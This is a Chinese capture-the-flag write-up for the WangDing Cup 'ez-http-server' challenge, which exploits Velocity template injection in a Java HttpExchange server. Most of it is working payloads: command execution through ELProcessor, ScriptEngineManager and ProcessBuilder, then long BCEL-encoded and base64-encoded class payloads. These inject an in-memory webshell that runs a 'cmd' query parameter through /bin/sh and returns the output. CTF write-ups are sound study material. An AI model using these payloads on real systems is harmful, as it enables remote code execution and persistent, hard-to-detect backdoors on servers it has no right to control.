网鼎杯JAVA复现

2022-09-01

ez-http-server

网鼎杯朱雀组web

一个java 的HttpExchange起的服务，自己实现了一套MVC逻辑。
然后有个velocity的模板注入，但是不知道为什么没有回显，并且远程是不出网的，所以这里要打内存马的方式去回显，最恶心的地方是这个模板不好构造类型数组，他本身的数组是ArrayList，所以通过其他方法去实现。

最后调试复现其实可以通过很多方法

ELProcessor:
    #set($x=$i18n.getClass())
    #set($el=$x.class.forName("javax.el.ELProcessor").newInstance())
    $el.eval('Runtime.getRuntime().exec("touch /tmp/successELProcessor")')


ScriptEngineManager:
noshorn:
    #set($x=$i18n.getClass())
    #set($semcls=$x.class.forName("javax.script.ScriptEngineManager"))
    #set($sem=$semcls.newInstance())
    $sem.getEngineByName("noshorn").eval("java.lang.Runtime.getRuntime().exec('touch /tmp/successSEM\');")
javascript:
    #set($x=$i18n.getClass())
    #set($semcls=$x.class.forName("javax.script.ScriptEngineManager"))
    #set($sem=$semcls.newInstance())
    $sem.getEngineByName("JavaScript").eval("java.lang.Runtime.getRuntime().exec('touch /tmp/successSEM\');")


java.lang.ProcessBuilder:

    #set($x=$i18n.getClass())
    #set($list=$x.class.forName("java.util.List"))
    #set($pbcls=$x.class.forName("java.lang.ProcessBuilder"))
    #set($pbcon=$pbcls.getDeclaredConstructor($list))
    #set($alistcls=$x.class.forName("java.util.ArrayList"))
    #set($arrtest=["/bin/sh","-c","touch /tmp/successPB"])
    #set($pb=$pbcon.newInstance($arrtest))
    $pb.start()

XMLDecoder：

这里的$i18n是自带的变量，也可以通过

1	#set($e="e");

去平替。
这里就通过一般注内存马的思路，遍历线程拿到handle，然后注入新的handle，这里展示几种方法

BECL

在Java 8u251以后该类无法利用
然后因为该类有个小限制，如果有继承非"java.", "javax.", "sun."包中的类需要额外设置，因为调用BCEL无参的构造方法之后loadclass会走SyntheticRepository的，所以会有classpath限制。可以通过添加ignored_packages来绕过限制。
因为这里无法直接通过构建数组来绕过，所以通过反射修改原本的设定值
payload：

#set($e="e");#set($x2=$e.getClass().forName("com.sun.org.apache.bcel.internal.util.ClassLoader").newInstance());#set($field=$x2.getClass().getDeclaredField("ignored_packages"));$field.setAccessible(true);#set($ig=$field.get($x2))#set($ig[2]="com.");$field.set($x2,$ig);#set($becl="$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dW$J$7c$UW$j$fe$5e$f6$98$c90$9b$90M$d2$b0$40$cbU$m$81$84$a5$d0R$ba$i$85$a4E$82$J$d0$q$80$L$k$9d$ecN$92$85$cd$ee2$3bK$89Z$ac$daZ$8f$da$da$aa$uZ$5bEm$c4zQ$eb$G$h9$bc$Q$5b$bc$f1$ae$d6$a3$ad$da$DQ$5b$8f$a2$c4$ef$cdn$ee$N$ed$ef$97$bc$9dy$ef$ff$be$ff$f5$fd$ff$ef$cd$a3$X$k9$G$e0J$e1$d7p$xnS$f1$O$f9$7b$bb$8awjx$X$de$ad$e1$3d$b8C$c5$7b5$94$e1$ceb$dc$85$f7$v$b8$5b$83$86$7b$e4$f0$7e9$7c$40$c3$H$b1_$c5$87$a4$cc$87$V$iP$f1$R$V$lUp$af$86$K$7cL$O$f7$v$b8_$c3$c7$f1$J$NU8$a8$e0$93$K$3e$a5a$g$Oj$98$8aO$cb$e1$B$F$bd$w$3e$a3$e2$90D$f9$ac$i$k$94$c3$e7$a4$V$9f$97$c3$XT$7cQ$c3$97pX$O$Pi$a8$c7$3d$w$be$ac$e1a$7cE$bedU$f4i8$82$afjx$E$fdr$f8$9a$8a$9b$V$ec$93$SGU$i$93h$c7U$9c$90$d6$7e$5d$c57T$7cS$c5$b7$U$7c$5b$c3J$9cT$f1$j$b9$e7$94$86$Z$f8$ae$82G$V$3c$a6$e0$b4$80$b7$cbHD$e3$a6$40uuS$q$d9$jLg$S$c1$84i$H$bbl$3b$956$ad$3d$a6$V$5c$cf$c7$eb$f7F$u$d8i$ae$a8$d9$w$e0nHF$b9$a3$b4$v$9607f$ba$dbM$ab$cdh$97$Y$fe$a6d$c4$88o5$ac$98$7c$cfO$fa$M$cb2z6u$b4$daV$y$d1$vP$be$a3i$a7$b1$c7$I$c6$89$X$ccM$ae$Q$uIY$c9$88$99N$d7gb$f1$a8i$JL$j$n$b5y$d4$g$a5$95$bc4$d1$c6$8bq$bd$bc$3d$d3$d1aZf$b41$91$ca$d8Tb$g$dd$C$97$e6dc$c9$60$fd$f8ei$c3$e0$ae$W$d3pl$982nCn$85$b2n$bb$xF$f5$VN$d0$i$v$dbL$db$c1pOT$ea$X$b6$c0$dcW$UO$B$d52$d3$a9d$o$ed$c4$af$40d$3c$bb3$a6$d5C$8d$7b$Mk$v$T$96$cc$d84Z$60$c6$b0q$3d$b6$b9$d6$J$b2$b34$e4$8f$xm$d3$J_$daA$g$Kl$60$9c$92$e1$b8$W$r$e9$d3$rC$c0c$f0$7c$ad$b6$R$d9$d5l$a4$9c$cc$3a$q$fa$k$cbA$c1$G$F$dfg$d9$b0$o$U$fc$80$a5$e0$U$40$af$80F7$cd$94$j$a3w$K$7eH$dbW$c6$S1$7b5$z$ab$96$3c$w$8a$dbC$da2v$y$k$q$a1v$99$d1$a6X$da$961L$8e$O$c8$a6$f6$9df$c4Y$60$a4$wG$y$M$v$e1$9a$d7$ee$a2$b1$d1$d1$3b$db$9c9$Z$90d$fbN$G$b4$pf$c6$a3$a3$Da$99$jq$a2$H$d7$c9$rI$b0$iNz$M$5d$f3HN$f1$fcH$c1$8f$e9bk2cE$ccu1I$f5b$99$feER$5c$c1Ot$9c$c1O$e9$9f$9d$ccD$baf$G$ed$ee$U$c9$Q$91$E$5dd$ef$b5u$fc$M$3f$97$B$df$c5$m$ea$f8$F$7e$a9$e0W$3a$7e$8d$c7$e9$e0$w$j$bf$c1o$V$3c$a1$e3w$f8$bd$40$d5$E$Z$d3$91$c2n$j$7f$c0$lu$3c$89$c7$V$3c$a5$e3i$fc$89$8eF$ba$a3$3a$fe$8c$bf$IL$k$bb$97$ce$F$dbc$89$60$ba$8b$ea$eb$od$f9D$85$s$e1$9f$d1$f1$y$9e$T$98v$91$d2a$d2u$3c$8f$b3R$fe$af$f4$b8p$d10$e0$83$L$p$f6$e6$d6$e4$ces$3a$fe$s$bd$_$_$90Y$c6Dc$e2$b6$b4$ad$ab$5b$ae$e3$ef$f8$87$dc$f0$82$8e$X$f1O$j$ff$c2$bfu$fc$H$_$d1$ed$cev$86$f3$bc$8e$ff$e2$7f$3a$$$607$d1F$84$3f$9e4$a22$f6L$9c$8e$B$B$5d$IQD$d8N$x$99I$v$c2$a5$L$b7$f00$b1$ba$f0$KE$X$aa$u$d6$85$sMRsy$af$5b$aa$8bIB$97$y3$acN$939$7cZ$f8$i$ce$c5$d2$97$_$a6X$q$99$b0$cd$bd6Y$e3$8e$93$c4l$P$85$b8$z$91K$98$85$5c$e7$b5tQ$w$s$eb$a2LZ$eb$l$dfMFe0W$D$C$b3$_$d2Z$d6$e7$60$F$e6$bc$82$fe$c3$a6x$d1$$$oP6$8e$j$83$v$92$89$dc4$oEU$T$94$d3$u$P$da$f2$f59$C$b6$r$93$b0c$dd4EcL$87$5e$w$abk$9a$c6$c9$c8$c6k$ee5I$da$f9$d5$e3$7beM$c1$b3$c0$tQM6$d1$b4$bd$a5$a5$91$c6$M$C$cb$b0p$86$o$fa$c8w$e6$91$3bn$c85$dd$8aQV$M$f7$e4t$w$k$b3$t$b0$a2$e0$f96$b2$M$7b$d2$b6$d9$z$bb$91l$e3$95C$ddv3E$87$9b$ad$d7H$a5$cc$E$pU$f72$9e$8e$ed$e1$aa$9d$i$3aj$L$40$3b$87$t$df$e2$J$Z$e3$C$d0l$cc$5e$86$cb$88$a7$c7$I$e4$hp$cdv$96xu$B$t$e5NO$9a$a5a$8f$cd$dep2J$Y$daQgr$d5$a0$e0$e8$b6$40$d1$v$d5$F$X$a4$96$f2$e1$a5$fc$81$ygU$c9$yy$t$c9eP$f2Y$9ef$FST$_5$ef$a8$9f$c0$fd$b8$99$e8$b4$bb$9cc$8at$uO3$P$z$f9Cz$bd$a3$8f$b8$9e$ea$c6$NR$b8$d4$a1Wn$b1$3e$Z$ed$91$86$d7Lt$82V$U$9a$t$d6MV$cc6$r$e6$8ez$t$8a$91xR$de$H$7c$91$8ce$99$J$7b$b0hF$b3q$e8X$93$de6$c4$N$a72GI8$93$U$u$j3E$3ar$cbuf$qn$b0$3d$e7$8b$f4$e5x6$f6$88$f4$a5M$7b$ads$9e$c5$9c$7b$9e$bbz$bb$b4$ddEd$81y$85$88S$e80W$u$be$d1$90$F$eftO$p$96$a0u$d3F$een$e82$acVY$bf$89$88$e9$90$af$m$v$b7$ca$f9$c6$82$w$5cisl$a9$e6$d7$K$e3$94$a6r$d5$c2$bbN$9beDL$cc$c2Z$5e$c0$F$g$f8$jQ$c4$df$ebp$3d$7f$d7$f1$c5$82$H$3e$40$a8G$m$fcEY$b8$b6$f9$dd$cd$L$b3$f0d$e1$ddX$e7W$b2PC$ee$87P$dc$P$z$dc$87I$B$b7kI$Wz$c0$ed$96$3fY$f8$b2$u$R$n$8f$Iy$f3$C$nE$8a$f8K$b3$98$7c$A$dd$de$a3$u$L$bb$fc$fe$d6$b0$db_$de$g$f6$c8$7d$ad$n$b5$l$V$e1$80$da$87$caPq$a08$8bKBZ$3f$aa$c2$B$z$8b$v$7d$I$84$s$f5cj$b8$l$d3$c2$81I$7d$98$de$87KCz$80$ba$$$L$87$bc$tQ$SP$C$5e$ea$de$d6$3b$f0$7c$80$e6$f9$9a$7b$e1$91$90$8e$faZ$ae$f8gr$e8$a7$e2Z$ff$ac$yf$fbg$f5aN$ce$d8$e6$85e8E$91$cbo$cbb$$$9d$9c$XR$Dj$ad$7f$3e$a5$b2$a8$O$a8Y$d4$ift$b6$f03$e3$u$bf2$5cx$V$e3$d5$8e$v$i$7d$uF$Jt$94$f2$5bi2$a6$f3K$r$E$3fV$a1$ik8$d3$88J$ee$9a$828$C$b8$89$dfJ$fb$f8$e5t$H$a5$ee$c3e8D$a4$871$9b$98sp$is$f1$U$e6$f1$9a0$9f$87$7e$8d$u$c2B$a1$a0$W$eb$a9$e1N$e2$c7$b1$91X$h$a0$S$a5$B$afF$T$b5$ee$e3$c7O3$e75$o$$$c2$sl$c6$q$e2N$c7$Nh$a1$3d$cc$iZ$d1$c6$fd$f2i$L$b6$d2$7ey$7b$d8$86$d70$c3$Vx$Ba$3e$b9$u$ff$i$b6$T$d9M$9b$l$c3$O$bc$96y_$83Sx$jW$bd$d4y$i$af$c7$h$a0$d0$aa2$dc$I$83$W$b4$T$b2$N$ee$B$w$f3$v$88$u$88$w0$9d$bf$O$F$9d$ceC$97$f3$iS$b0S$B$af$zq$a0r$80$3b$d5$89$c4Ag$d9$y$SDv$d3$ce$q$ffy$fd$cb3$f1FZ$a9$d1$L$y$e8$c3$C$c9$c6$85$92$8dGP$db$c4$87$3a$ff$a2$y$82$cd$b5$ee$y$W$d7$f2$fd$8a$dc$e4$92$b1$93$t$b0$94$7f$h$ebB$ee$80$fb$d82$8fk$99$b7$d2$5b$e99$88C$Bw$a5w$J$c9I$c6$5c$e9$bf$w$8be$Hp$97$7c$a9$f3_$3d$8c$n$t$aeh$o$db$J$b6$dcQpM$n$ad$a1B$93$x$c6$9b$b2R$d2$cb$95$c5$aa$i$cd$eb$fc$abG$a8$w$5e$90$c5$b5$bd$d0$a4L$Wkn$f5$8a$de$81$ad$bdp7$jf$3cb$bc$b2$9e$ro$7c8$cfK$e0$m$T$f7$93$3d$c0$S$c6n$vW$961SW$93g$cb1$T$d7$90S$x$b0$98L$b9$8a$f9$5d$81$d5d$cf$b5$cc$f1$g$o$d5$c3$e6$5b$Pk$fe$WV$fd$edD$ba$9b$7c$db$cf$9c$dfK$7e$3d$40n$3dHv$j$s$af$fa$c9$a9$Td$d5I2$ea4s$7f$86$7cz$82Lz$92$iy$96hg$c9$a0s$e4$ce$8b$c4$3eO$8e$5c$mS$G$c8$T$c9$de$W$e6$fd4$z$b5$90$e6$d3$ZTQk$86$ec$3dG$9e$ed$n$9bU$ee$3f$80$bd$b4C$a1$dd$cf$e0$8d$5ce$9b$e4$d7$c1$9b$f0fz$dc$80$p$b8$99$5cwI$G$e4$Z$z$Z$b8$B$de$B$9a$a78$94z$8b$82$5b$U$y$e5$9f$a0$d0$A$ee$cfSm$e4$bc$82$b7$3a4$7bIn$f4$c8$c7$IP$cf$J$M$f1n$G$ff$df$e6t$c2$b7$ff$l$7e$40$kt$5c$R$A$A")#set($list=$x2.loadClass($becl).newInstance());

这样直接加载实例化字节码就可以注入内存马了

ScriptEngineManager

javax.script.ScriptEngineManager 可以直接反射这个类来执行任意java代码，然后执行类加载器来加载任意字节码，以此来注入内存马，https://xz.aliyun.com/t/9715#toc-3

主要注意的点就是js去操作java对象时候要Java.type先获取一下，然后通过new去实例化。

#set($e="e");#set($jj=$e.getClass().forName("javax.script.ScriptEngineManager").newInstance());$jj.getEngineByName("js").eval("var str='yv66vgAAADQBEgoAhACFCACGCgCEAIcIAIgKAIkAigoAiwCMCACNCgARAI4JAI8AkAcAkQoACgCSCgAKAJMKAAoAlAoAlQCWCACXCgARAJgHAJkIAJoIAJsHAJwKABQAnQoAFACeBwCfCgCgAKEKABcAogcAowcApAoAGwCiCgAaAKUKABoApgcApwgAqAgAqQoAEQCqCgARAKsKABEArAoAiQCtCgCJAK4IAK8KALAAsQoAsACyCgBCAJIIALMKALQAtQoAQgC2CAC3CgC4ALkKALoAuwoAugC8CAB9BwB+CgC0AL0IAL4KABEAvwgAwAoAlQDBCADCCADDCADEBwDFCgA8AMYIAMcKALoAyAoAHwDJBwDKBwDLBwDMAQAGaGFuZGxlAQAoKExjb20vc3VuL25ldC9odHRwc2VydmVyL0h0dHBFeGNoYW5nZTspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAA1hcnJheU9mU3RyaW5nAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEADnByb2Nlc3NCdWlsZGVyAQAaTGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcjsBAAdwcm9jZXNzAQATTGphdmEvbGFuZy9Qcm9jZXNzOwEAE2J1ZmZlcmVkSW5wdXRTdHJlYW0BAB1MamF2YS9pby9CdWZmZXJlZElucHV0U3RyZWFtOwEADmJ1ZmZlcmVkUmVhZGVyAQAYTGphdmEvaW8vQnVmZmVyZWRSZWFkZXI7AQAEdGhpcwEAFExjb20vamF2YS90ZXN0L1l5ZHM7AQABdAEAJUxjb20vc3VuL25ldC9odHRwc2VydmVyL0h0dHBFeGNoYW5nZTsBAAhyZXNwb25zZQEAEkxqYXZhL2xhbmcvU3RyaW5nOwEABXF1ZXJ5AQAEdmFyMwEABm91dHB1dAEAH0xqYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbTsBAANzdHIBAA1zdHJpbmdCdWlsZGVyAQAZTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEAAm9zAQAWTGphdmEvaW8vT3V0cHV0U3RyZWFtOwEADVN0YWNrTWFwVGFibGUHAMoHAM0HAJkHAEoHAM4HAJEHAJwHAM8HAJ8HAKMHAKcBAApFeGNlcHRpb25zBwDQAQAGPGluaXQ+AQADKClWAQACbHQBABZMamF2YS91dGlsL0xpbmtlZExpc3Q7AQABbwEAEkxqYXZhL2xhbmcvT2JqZWN0OwEAAWUBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBAAZ0aHJlYWQBABJMamF2YS9sYW5nL1RocmVhZDsBAANvYmoBAAVmaWVsZAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAAd0aHJlYWRzAQATW0xqYXZhL2xhbmcvVGhyZWFkOwcAywcA0QcA0gEAClNvdXJjZUZpbGUBAAlZeWRzLmphdmEHANMMANQA1QEAFnRvdWNoIC90bXAvc3VjY2Vzcy50eHQMANYA1wEAAm9rBwDNDADYANkHANoMANsA3AEAAT0MAN0A3gcA3wwA4ADhAQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIMAHAAcQwA4gDjDADkANwHAOUMAOYA5wEAA2NtZAwA6ADpAQAQamF2YS9sYW5nL1N0cmluZwEABy9iaW4vc2gBAAItYwEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgwAcADqDADrAOwBABtqYXZhL2lvL0J1ZmZlcmVkSW5wdXRTdHJlYW0HAM8MAO0A7gwAcADvAQAWamF2YS9pby9CdWZmZXJlZFJlYWRlcgEAGWphdmEvaW8vSW5wdXRTdHJlYW1SZWFkZXIMAHAA8AwA8QDcAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAAQoBAAVVVEYtOAwA8gDzDABwAPQMAPUA9gwA9wD4DAD5APoBAANnYmsHAPsMAPwA/QwA/gBxAQATdG91Y2ggL3RtcC9sb2FkLnR4dAcA0gwA/wEADAEBAQIBAAVncm91cAcBAwwBBAEFBwDRDAEGAQcMAQgBCQwBCgDcAQAIVGhyZWFkLTMMAQsBDAEABnRhcmdldAwA5gENAQAGdGhpcyQwAQAIY29udGV4dHMBAARsaXN0AQAUamF2YS91dGlsL0xpbmtlZExpc3QMAQgBDgEAB2hhbmRsZXIMAQ8BEAwBEQBxAQASY29tL2phdmEvdGVzdC9ZeWRzAQAQamF2YS9sYW5nL09iamVjdAEAImNvbS9zdW4vbmV0L2h0dHBzZXJ2ZXIvSHR0cEhhbmRsZXIBACNjb20vc3VuL25ldC9odHRwc2VydmVyL0h0dHBFeGNoYW5nZQEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBABBqYXZhL2xhbmcvVGhyZWFkAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEADWdldFJlcXVlc3RVUkkBABAoKUxqYXZhL25ldC9VUkk7AQAMamF2YS9uZXQvVVJJAQAIZ2V0UXVlcnkBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEABXNwbGl0AQAnKExqYXZhL2xhbmcvU3RyaW5nOylbTGphdmEvbGFuZy9TdHJpbmc7AQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEACHRvU3RyaW5nAQATamF2YS9pby9QcmludFN0cmVhbQEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAAZlcXVhbHMBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQAFc3RhcnQBABUoKUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAIZ2V0Qnl0ZXMBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCAQAXKFtCTGphdmEvbGFuZy9TdHJpbmc7KVYBAAZsZW5ndGgBAAMoKUkBABNzZW5kUmVzcG9uc2VIZWFkZXJzAQAFKElKKVYBAA9nZXRSZXNwb25zZUJvZHkBABgoKUxqYXZhL2lvL091dHB1dFN0cmVhbTsB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';var Thread = Java.type('java.lang.Thread');var tt=Thread.currentThread().getContextClassLoader();var b64 = Java.type('sun.misc.BASE64Decoder');var b=new b64().decodeBuffer(str);var byteArray = Java.type('byte[]');var int = Java.type('int');var defineClassMethod = java.lang.ClassLoader.class.getDeclaredMethod('defineClass',byteArray.class,int.class,int.class);defineClassMethod.setAccessible(true);var cc = defineClassMethod.invoke(tt,b,0,b.length);cc.newInstance();");

XMLDecoder

https://xz.aliyun.com/t/10323
其实也是用类加载器加载字节码，思路都差不多这里就不写具体的payload了